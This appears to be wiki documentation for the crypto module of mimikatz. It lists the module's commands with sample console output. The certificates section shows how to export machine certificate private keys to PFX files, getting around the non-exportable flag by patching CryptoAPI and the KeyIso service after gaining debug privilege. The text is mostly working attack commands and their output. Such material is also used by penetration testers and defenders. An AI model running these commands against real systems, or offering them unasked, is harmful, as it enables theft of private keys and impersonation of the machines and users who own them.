module ~ crypto

providers

This command list all providers: CryptoAPI, then CNG if available (NT 6).

mimikatz # crypto::providers

CryptoAPI providers :
 0. Microsoft Base Cryptographic Provider v1.0
 1. Microsoft Base DSS and Diffie-Hellman Cryptographic Provider
 2. Microsoft Base DSS Cryptographic Provider
 3. Microsoft Base Smart Card Crypto Provider
 4. Microsoft DH SChannel Cryptographic Provider
 5. Microsoft Enhanced Cryptographic Provider v1.0
 6. Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
 7. Microsoft Enhanced RSA and AES Cryptographic Provider
 8. Microsoft RSA SChannel Cryptographic Provider
 9. Microsoft Strong Cryptographic Provider
10. SafeSign Standard Cryptographic Service Provider
11. SafeSign Standard RSA and AES Cryptographic Service Provider

CNG providers :
 0. Microsoft Primitive Provider
 1. Microsoft Smart Card Key Storage Provider
 2. Microsoft Software Key Storage Provider
 3. Microsoft SSL Protocol Provider
 4. SafeSign Key Storage Provider

stores

Argument:

• /systemstore - optional - the system store that must be used to list stores (default: CERT_SYSTEM_STORE_CURRENT_USER)
  It can be one of:
  • CERT_SYSTEM_STORE_CURRENT_USER or CURRENT_USER
  • CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY or USER_GROUP_POLICY
  • CERT_SYSTEM_STORE_LOCAL_MACHINE or LOCAL_MACHINE
  • CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY or LOCAL_MACHINE_GROUP_POLICY
  • CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE or LOCAL_MACHINE_ENTERPRISE
  • CERT_SYSTEM_STORE_CURRENT_SERVICE or CURRENT_SERVICE
  • CERT_SYSTEM_STORE_USERS or USERS
  • CERT_SYSTEM_STORE_SERVICES or SERVICES

mimikatz # crypto::stores /systemstore:local_machine
Asking for System Store 'local_machine' (0x00020000)
 0. My
 1. Root
 2. Trust
 3. CA
 4. TrustedPublisher
 5. Disallowed
 6. AuthRoot
 7. TrustedPeople
 8. ADDRESSBOOK
 9. ipcu
10. Remote Desktop
11. REQUEST
12. SmartCardRoot
13. TrustedDevices
14. Windows Live ID Token Issuer

certificates

This command lists certificates and properties of theirs keys. It can export certificates too.

Argument:

• /systemstore - optional - the system store that must be used (default: CERT_SYSTEM_STORE_CURRENT_USER)
• /store - optional - the store that must be used to list/export certificates (default: My) - full list with crypto::stores
• /export - optional - export all certificates to files (public parts in DER, private parts in PFX files - password protected with: mimikatz)

mimikatz # crypto::capi
Local CryptoAPI patched

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # crypto::cng
"KeyIso" service patched

mimikatz # crypto::certificates /systemstore:local_machine /store:my /export
 * System Store  : 'local_machine' (0x00020000)
 * Store         : 'my'

 0. example.domain.local
        Key Container  : example.domain.local
        Provider       : Microsoft Software Key Storage Provider
        Type           : CNG Key (0xffffffff)
        Exportable key : NO
        Key size       : 2048
        Public export  : OK - 'local_machine_my_0_example.domain.local.der'
        Private export : OK - 'local_machine_my_0_example.domain.local.pfx'

Remarks:

• See crypto::stores for valid systemstore list, and its output for store list.
• Non exportable keys (with KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b)) can often be exported with crypto::capi and/or crypto::cng
• Despite crypto::capi or crypto::cng patch, you must have correct ACL on filesystem to access private keys (UAC... 😉)
• Some smartcard crypto providers can report a successfull private export (it's not, of course 😉)

keys

capi

mimikatz # crypto::capi
Local CryptoAPI patched

cng

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # crypto::cng
"KeyIso" service patched